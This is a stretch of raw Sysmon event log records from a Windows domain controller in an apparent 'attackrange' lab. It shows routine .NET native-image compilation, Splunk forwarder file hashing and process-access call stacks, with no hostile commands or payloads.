21:02:48.613{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b0-0\System.Transactions.dll2021-06-23 21:02:48.613 23542300x800000000000000019750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.254{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=68CA6FF180E3F19ED34F048146807DA3,SHA256=A645502F99D5B1DF5962180CB303E95FDCDEB99FD5A84498DFD293B9FCAB97E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.144{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61efc|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000019748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.144{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61efc|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000019747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.144{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.113{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.113{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0803-00000000CF01}4784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000019744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:46.277{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61397-false10.0.1.12-8000- 10341000x800000000000000019743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.019{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.019{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A178-60D3-0703-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:48.004{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB759303FCC590B5D283A2ABF16F77F8,SHA256=AB2F80BD4E66F00AC95B18D3EA7FA915980E19D8034084A2B01E4505138EA721,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.754{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=204210C552E51A4B767F849A7290EE77,SHA256=D24A95FAAFE2F2BABD819239B24770011C326C71D6A9E78F77B8A7AE97E25702,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.098{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.082{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.082{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A179-60D3-0A03-00000000CF01}4392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:49.019{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=045FB30CA09E55B0BE293C3A9E045EF7,SHA256=761A145A82DB5144875EB0300E8D6361E7F30CA3D94DEB285B852A8F70600851,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.968{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.953{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0F03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.874{4DB9351A-A17A-60D3-0E03-00000000CF01}6512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\A85344AH8L\System.Configuration.Install.ni.dll.auxMD5=66A5D6A518D673D91B07970E39A615C9,SHA256=48CDB45F5BB50657F1E096A1A785CF6603009B01A3D723F81A8E3E4284233E37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.874{4DB9351A-A17A-60D3-0E03-00000000CF01}6512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\A85344AH8L\System.Configuration.Install.ni.dllMD5=B755C1222F499DEC3761B2043A8AD309,SHA256=0D5ABE3783AC66E16D0158045499C4F46E38E994E93A1C860BB040EDACA85FF0,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:50.859{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1970-0\System.Configuration.Install.dll2021-06-23 21:02:50.859 10341000x800000000000000019780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.671{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.671{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0E03-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.469{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.437{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:50.437{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A17A-60D3-0D03-00000000CF01}4980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6